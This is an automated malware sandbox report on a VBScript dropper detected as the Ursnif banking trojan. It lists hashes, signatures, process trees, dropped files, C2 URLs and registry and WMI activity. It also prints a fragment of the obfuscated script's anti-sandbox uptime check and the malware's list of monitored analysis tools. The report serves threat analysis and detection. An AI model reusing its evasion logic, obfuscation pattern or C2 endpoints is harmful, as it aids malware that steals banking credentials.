
Analysis Report IYhAQFCrF1sk.vbs

Overview

General Information

Sample Name:IYhAQFCrF1sk.vbs
Analysis ID:285943
MD5:88d06f971fb46ed7164bbaeec852cbb2
SHA1:d8c80137b3ed1168a3a08f15a7bbdd33e5b38fdb
SHA256:29b80298cbd5f207bedb6bdf997cefe1d99ea64b391e8b465661c498dd06c49c

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
WScript reads language and country specific registry keys (likely country aware script)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 4588 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\IYhAQFCrF1sk.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 6808 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6824 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6992 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5396 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6992 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 8 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 2664 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:8 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5712 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6388 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5712 CREDAT:9474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000003.500085579.00000000052D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.500051459.00000000052D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.500010195.00000000052D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000002.1435502688.00000000052D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.499924506.00000000052D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\irritable.docx | Avira: detection malicious, Label: TR/AD.UrsnifDropper.wdonj
Multi AV Scanner detection for domain / URL
Source: api10.laptok.at | Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\irritable.docx | Virustotal: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\irritable.docx | ReversingLabs: Detection: 27%
Multi AV Scanner detection for submitted file
Source: IYhAQFCrF1sk.vbs | Virustotal: Detection: 17%
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: msapplication.xml1.16.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x7dfdd6ed,0x01d68bdc</date><accdate>0x7dfdd6ed,0x01d68bdc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.16.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x7dfdd6ed,0x01d68bdc</date><accdate>0x7e003956,0x01d68bdc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.16.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x7e039a03,0x01d68bdc</date><accdate>0x7e039a03,0x01d68bdc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.16.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x7e039a03,0x01d68bdc</date><accdate>0x7e039a03,0x01d68bdc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.16.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x7e039a03,0x01d68bdc</date><accdate>0x7e039a03,0x01d68bdc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.16.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x7e039a03,0x01d68bdc</date><accdate>0x7e05fd06,0x01d68bdc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown | DNS traffic detected: queries for: api10.laptok.at
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 15 Sep 2020 18:49:47 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {D082B5AC-F7CF-11EA-90E2-ECF4BB862DED}.dat.23.dr, ~DF13AA7F6DD01F3DF4.TMP.23.dr | String found in binary or memory: http://api10.laptok.at/api1/MHNewQWU4TN/oFwdVVblAWldph/Q3aIHM5zo_2Ft0LLIwG0K/XFQjeVBHQWvNmCAB/aR4FiL
Source: {C24EDA0C-F7CF-11EA-90E2-ECF4BB862DED}.dat.21.dr | String found in binary or memory: http://api10.laptok.at/api1/fJ6c2Fa3dA/3CKfLzNor8pqk4Jmg/t6nhaoaQzgIh/iB9KATHxKvZ/TpfZcnDlgVk4zj/7_2
Source: {DE716D2B-F7CF-11EA-90E2-ECF4BB862DED}.dat.29.dr | String found in binary or memory: http://api10.laptok.at/api1/pnyPKrKyWn/YCs_2BdKAk1nNhptr/4REunxu4Qu5G/DvcNG5W4SIQ/AZBtRqDLZmxMiX/XXa
Source: {A820A091-F7CF-11EA-90E2-ECF4BB862DED}.dat.16.dr, ~DF33CE763D0D4F4B60.TMP.16.dr | String found in binary or memory: http://api10.laptok.at/api1/vpB6SFrd2r1zi/Pa8XSGRT/EoCxEQKkUcgs_2F6Qlc7nXQ/ztKXRXAL2Y/3eUDp8C_2BcfhM
Source: msapplication.xml.16.dr | String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.16.dr | String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.16.dr | String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.16.dr | String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.16.dr | String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.16.dr | String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.16.dr | String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.16.dr | String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.500085579.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.500051459.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.500010195.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1435502688.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.499924506.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.499957979.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.500113123.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.500143060.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.500131153.00000000052D8000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\irritable.docx C166B0023FC766351CF635FB0CBA02C2116825C4F8D8E139D4B2CDB6554E81EA
Source: IYhAQFCrF1sk.vbs | Initial sample: Strings found which are bigger than 50
Source: classification engine | Classification label: mal100.troj.evad.winVBS@13/68@22/2
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{A820A08F-F7CF-11EA-90E2-ECF4BB862DED}.dat
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\IYhAQFCrF1sk.vbs'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: IYhAQFCrF1sk.vbs | Virustotal: Detection: 17%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\IYhAQFCrF1sk.vbs'
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:9474 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6992 CREDAT:9474 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:8 CREDAT:9474 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5712 CREDAT:9474 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:9474 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6992 CREDAT:9474 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:8 CREDAT:9474 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5712 CREDAT:9474 /prefetch:2
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002\Software\Microsoft\Office\16.0\Lync
Source: IYhAQFCrF1sk.vbs | Static file information: File size 1374433 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: c:\39\58\we\She\dollar\54\fun\17\58\Written\56\Coast.pdb | source: irritable.docx.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.ScriptName, cStr(638293031)) > 0 And compendia391 = 0) ThenExit FunctionEnd If' whod breakthrough baleful peephole cocoa administer Bern spacetime sweatband Renoir pang keen inhalation windbag domestic whatever, 3959229 associable fervid influent GPO Schloss Urdu offal Faust Joaquin lapelled perilous horrible943 sequestration auric911 plan385 serial993 trial standeth Jon smog ice digitalis996 emplace denote balustrade144 electroencephalograph commonality moonbeam keyword metamorphic loop332. interpretive indirect stork inductor lacrosse set problem480 = GetObject("winmgmts:\\.\root\cimv2")set sqXAi = problem480.InstancesOf("Win32_OperatingSystem")REM follicle674 Conrail chine science188 colorimeter serenade994 demur oxalic stretch, 8568349 soulful, sneeze Aquarius, nick FAA destitute herself excessive Leroy726 toolmake Jacobson neonate hillmen soignee ineducable transferor survivor polyhedral ROTC wrath318 sedan condolence nightfall interceptor historian picojoule screwbean opprobrium705 tease levity syllabic alba Cynthia benchmark variable projectile. 9323556 euphorbia loll althea balm mallard. tau solid eddy Burch tan445 Marjorie Montague crowfoot prompt. allow beware civilian sculpture611 Lucretius. benight849, 8269140 pelvis tenure lectern viscometer marvelous stickleback parry Pullman Baxter for each entomology in sqXAiREM gallium, thermo, Pilate, oratoric stonecrop vertex raucous carry glassine dirty joint290 mucosa poultice contradictory772 Othello eager Newcastle apex asperity aqua Orestes jackdaw carryover. Shelton Allan thrush. Huxley sip688, quip neater624 Madras massif. Xavier tupelo primp, insult catenate lesion satiety roomful Viet63 elfin spheroidal grassy incommutable Elmer Meiji orthonormal kerchief midshipmen omnipresent bedfast implicit495 shrub678 decibel Charlemagne morsel denumerable coltish. 
6639792 point marriage Drexel erudition400 Acapulco ATEmb = entomology.LastBootUpTimecnfkGw = Mid(ATEmb,1,4) & "-" & Mid(ATEmb,5,2) & "-" & Mid(ATEmb,7,2) & " " & Mid(ATEmb,9,2) & ":" & Mid(ATEmb,11,2) & ":" & Mid(ATEmb,13,2)REM anatomist beth wing symbolic Hayes gallstone Quakeress cheeky, 330596 Yarmouth hybrid gent indigene Medea414 Belshazzar narcotic transposable. cessation rhapsody. 1410370 Bausch algebraic jaunty pinnate macabre justiciable. 6889385 buildup, recruit264 condemn prey flannel729 Orinoco murder Kirkland Papua checksumming cutthroat cameraman716 enunciate fluid Ostrander Angela cretinous anthracite sorrel Beverly370 scarp superfluous barn acrylic Keynes, injury Lares vomit493 stopwatch837 equilibrium Donner scrounge true417 Cromwellian baroque part940 psychometry795 manipulate tumble. 555949 brownish briar Moluccas mock this unanimity trichloroethane simmer338 mantis Markov interruptible blackguard terrestrial salmonella archbishop. 7134769 docket hank aphasia Canaveral Keller realtor follicular amende fortunate terpsichorean Marlene kQBBGBec = abs(datediff("s",cnfkGw,now))YUCYVJ = kQBBGBec \ 60melan

            Persistence and Installation Behavior:

            Creates processes via WMI
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\irritable.docx

            Hooking and other Techniques for Hiding and Protection:

            Yara detected Ursnif
            Source: Yara match | File source: 00000003.00000003.500085579.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.500051459.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.500010195.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.1435502688.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.499924506.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.499957979.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.500113123.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.500143060.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.500131153.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Deletes itself after installation
            Source: C:\Windows\System32\wscript.exe | File deleted: c:\users\user\desktop\iyhaqfcrf1sk.vbs
            Source: C:\Windows\System32\wscript.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmp | Binary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmp | Binary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmp | Binary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmp | Binary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmp | Binary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmp | Binary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmp | Binary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmp | Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmp | Binary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmp | Binary or memory string: DUMPCAP.EXE
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmp | Binary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: FORTITRACER.EXEA
            WScript reads language and country specific registry keys (likely country aware script)
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\irritable.docx
            Source: C:\Windows\System32\wscript.exe TID: 1488 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
            Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local

            HIPS / PFW / Operating System Protection Evasion:

            Benign windows process drops PE files
            Source: C:\Windows\System32\wscript.exe | File created: irritable.docx.0.dr
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmp | Binary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmp | Binary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.384040809.000001450EE44000.00000004.00000001.sdmp | Binary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.384002599.000001450EE51000.00000004.00000001.sdmp | Binary or memory string: regshot.exe

            Stealing of Sensitive Information:

            Yara detected Ursnif
            Source: Yara match | File source: 00000003.00000003.500085579.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.500051459.00000000052D8000.00000004.00000040.sdmp, type: MEMORY
